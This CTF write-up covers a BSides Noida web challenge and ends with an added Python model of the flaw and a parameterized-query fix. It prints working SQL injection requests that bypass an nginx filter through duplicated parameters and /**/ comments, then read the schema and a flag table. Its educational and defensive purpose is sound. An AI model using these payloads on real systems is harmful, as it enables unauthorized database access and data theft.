Just a place to see list of all challs from bsides noida CTF, maybe some flag too xD Note: Bruteforce is not required.
Downloading the source and hosting it locally in Docker, we see that the website takes a parameter chall_id. Looking at the index.php file, we see that the following SQL query is being executed.
But if we put a letter into the chall_id parameter, we get an error. Looking at config/ctf.conf in the source code, there is a regex that rejects letters and whitespace in the parameter.
To bypass this we can send the parameter twice, so that the first copy is the one nginx checks and the second copy gets past the check:
GET /?chall_id=1&chall_id=a
And to bypass the whitespace restriction we can use comments: instead of UNION SELECT, we use UNION/**/SELECT.
Opening karma.db (from the source code) in a SQLite browser, we see that the table has 6 columns.
To list tables and columns, I used the following payload:
GET /?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,sql/**/FROM/**/sqlite_master
This payload reveals a table named flagsss with a column named flag.
Now we can use the following query to retrieve the flag:
GET /?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,flag/**/FROM/**/flagsss
So the flag is BSNoida{4_v3ry_w4rm_w31c0m3_2_bs1d35_n01d4}
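The root cause here is a parser mismatch: the proxy-side regex and the PHP application disagree about which value of a repeated parameter counts, so a filter in nginx can never be the real defence. The Python model below is an added example, not code from the writeup or the challenge; it mimics PHP's last-value-wins handling of duplicate keys, a proxy filter that only inspects the first value (an assumption about the ctf.conf rule, whose exact pattern is not on the page), and a constructed stand-in for karma.db with a hypothetical six-column `challs` table plus the `flagsss` table named above. It then contrasts the concatenated query the writeup exploits with a hardened lookup that validates the type in the application and binds the value.

```python
"""Added example (not from the writeup): why a proxy-side regex on
query parameters does not protect a PHP/SQLite app, and what does.

Assumptions (not on the page): the table behind chall_id is called
`challs` with six columns, the proxy filter checks only the first
value of each parameter, and the regex rejects letters/whitespace.
"""
import re
import sqlite3
from urllib.parse import parse_qs

# Stand-in for the config/ctf.conf rule (assumed pattern).
FORBIDDEN = re.compile(r"[A-Za-z\s]")

# Constructed query string with the shape of the writeup's payload.
PAYLOAD_QS = ("chall_id=1&chall_id=1/**/UNION/**/SELECT/**/"
              "NULL,NULL,NULL,NULL,NULL,flag/**/FROM/**/flagsss")


def first_value_filter(query_string: str) -> bool:
    """Model of a proxy that validates only the first occurrence of each
    parameter (assumption).  Returns True when the request is allowed."""
    params = parse_qs(query_string, keep_blank_values=True)
    return all(not FORBIDDEN.search(values[0]) for values in params.values())


def php_style_get(query_string: str) -> dict:
    """PHP populates $_GET with the *last* value of a repeated key."""
    params = parse_qs(query_string, keep_blank_values=True)
    return {key: values[-1] for key, values in params.items()}


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for karma.db (schema and rows are invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE challs(id INTEGER, name TEXT, category TEXT,
                            points INTEGER, author TEXT, description TEXT);
        INSERT INTO challs VALUES (1, 'warmup', 'web', 50, 'admin', 'first');
        CREATE TABLE flagsss(flag TEXT);
        INSERT INTO flagsss VALUES ('FLAG{constructed_placeholder}');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, chall_id: str) -> list:
    """The pattern the writeup exploits: input concatenated into SQL.
    SQLite treats /**/ as whitespace, so the comment trick works here too."""
    return conn.execute(f"SELECT * FROM challs WHERE id={chall_id}").fetchall()


def lookup_safe(conn: sqlite3.Connection, chall_id: str) -> list:
    """Hardened form: type-check in the application, then bind the value.
    No proxy regex is needed because the SQL shape can no longer change."""
    if not re.fullmatch(r"\d{1,9}", chall_id):
        raise ValueError("chall_id must be a small positive integer")
    return conn.execute("SELECT * FROM challs WHERE id=?",
                        (int(chall_id),)).fetchall()


def demo(query_string: str) -> dict:
    """Run one query string through proxy model, vulnerable and safe lookups."""
    conn = make_db()
    allowed = first_value_filter(query_string)
    value = php_style_get(query_string).get("chall_id", "")
    result = {"proxy_allows": allowed, "app_sees": value}
    if allowed:
        result["vulnerable_rows"] = len(lookup_vulnerable(conn, value))
        try:
            lookup_safe(conn, value)
            result["safe_rejects"] = False
        except ValueError:
            result["safe_rejects"] = True
    return result


if __name__ == "__main__":
    print(demo("chall_id=1"))    # proxy allows, one row either way
    print(demo(PAYLOAD_QS))      # proxy allows, 2 rows leak, safe rejects
```

The takeaway for a defender is in `demo(PAYLOAD_QS)`: the proxy model passes the request, the concatenated query returns a second row that came from `flagsss`, and the bound query refuses the value before SQLite ever sees it. Parameter-pollution bypasses only exist because two components parse the same request differently, so the check has to live in the component that actually builds the query.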